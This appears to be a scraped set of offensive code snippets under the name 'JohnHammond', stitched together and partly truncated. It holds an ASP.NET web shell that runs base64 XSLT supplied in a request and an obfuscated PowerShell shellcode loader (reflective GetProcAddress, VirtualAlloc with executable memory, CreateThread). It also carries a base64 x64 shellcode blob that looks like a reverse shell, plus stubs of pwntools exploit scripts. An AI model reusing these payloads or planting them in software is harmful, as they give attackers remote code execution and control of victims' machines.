JohnHammond

<!DOCTYPE html>

<html>
    <head>
        <title>Please Subscribe</title>
    </head>
    <body>

        <script>
            // File name and contents

JohnHammond

<%@ Page Language="C#" %><% var c=new System.Xml.XmlDocument();c.LoadXml(@"<root>1</root>");var b=new System.Xml.XmlDocument();b.LoadXml(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request["REDACTED"])));var xct=new System.Xml.Xsl.XslCompiledTransform();xct.Load(b,System.Xml.Xsl.XsltSettings.TrustedXslt,new System.Xml.XmlUrlResolver());xct.Transform(c,null,new System.IO.MemoryStream()); %>

JohnHammond

#!/usr/bin/env python3

"""
# NOTE, you must change the string below for data you want.
# This script does not take arguments in its current form. Sorry!
"""

from pwn import *

string = b"foobar"

JohnHammond

#!/usr/bin/env python3

"""
# NOTE, you must change the filename below for the rp++ output you want to process.
# This script does not take arguments in its current form. Sorry!
"""

import re

from pwn import p32, u32

JohnHammond

$t6Y = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((sOH kernel32.dll CreateThread), (b9MW @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$sC6US,[IntPtr]::Zero,0,[IntPtr]::Zero)

[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((sOH kernel32.dll WaitForSingleObject), (b9MW @([IntPtr], [Int32]))).Invoke($t6Y,0xffffffff) | Out-Null

JohnHammond

$sC6US = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((sOH kernel32.dll VirtualAlloc), (b9MW @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $bUMJ.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($bUMJ, 0, $sC6US, $bUMJ.length)

JohnHammond

[Byte[]]$bUMJ = [System.Convert]::FromBase64String("/EiB5PD////ozAAAAEFRQVBSUVZI
MdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBm
gXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1B
AcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wg
QVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSDHAUFBJvAIALLcAAAAAQVRJ
ieRMifFBukx3Jgf/1UyJ6mgBAQAAWUG6KYBrAP/VagJZUFBNMclNMcBI/8BIicJBuuoP3+D/1UiJx2oQ
QVhMieJIiflBusLbN2f/1Ugx0kiJ+UG6t+k4///VTTHASDHSSIn5Qbp07Dvh/9VIiflIicdBunVuTWH/
1UiBxLACAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//VSIPEIF6J9mpAQVloABAAAEFYSInySDHJQbpY
pFPl/9VIicNJicdNMclJifBIidpIiflBugLZyF//1UgBw0gpxkiF9nXhQf/nWGoAWbvgHSoKQYna/9U=
"

JohnHammond

function b9MW {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $feiNr,
		[Parameter(Position = 1)] [Type] $owXkZ = [Void]
	)
	
	$hawT4 = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$hawT4.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $feiNr).SetImplementationFlags('Runtime, Managed')
	$hawT4.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $owXkZ, $feiNr).SetImplementationFlags('Runtime, Managed')
	

JohnHammond

function call_win32_api_function {
	Param ($function_name, $arguments)	

JohnHammond

function sOH {
	Param ($o73, $icO)		
	$zJ3 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	
	return $zJ3.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($zJ3.GetMethod('GetModuleHandle')).Invoke($null, @($o73)))), $icO))
}